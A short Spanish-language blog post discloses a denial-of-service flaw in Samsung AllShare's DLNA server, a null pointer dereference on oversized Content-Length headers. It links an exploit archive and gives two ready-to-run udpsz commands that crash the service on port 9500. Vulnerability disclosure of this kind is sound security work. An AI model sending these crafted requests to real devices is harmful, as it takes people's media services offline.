DoS en Samsung AllShare

AllShare es un servicio de Samsung para compartir contenido que te permite buscar y reproducir vídeos, fotos y archivos de música libremente entre varios dispositivos que lo soporten, como ordenadores, televisores, teléfonos móviles y cámaras digitales.

Luigi Auriemma ha descubierto una vulnerabilidad en AllShare que podría ser explotada remotamente para causar un DoS en el servidor DLNA (puerto 9500). 


Concretamente existe un error de desreferencia de puntero nulo en el módulo libpin3_dll.dll cuando procesa cabeceras HTTP, y puede explotarse especificando en la cabecera un Content-Length entre 4294967262 y 4294967293.

La vulnerabilidad se ha confirmado en la versión 2.1.0.12031_10 aunque podría afectar a otras versiones:

http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/19289.zip
 
  udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 2147483647\r\n\r\n" -T SERVER 9500 -1
or
  udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 4294967293\r\n\r\n" -T SERVER 9500 -1

Comentarios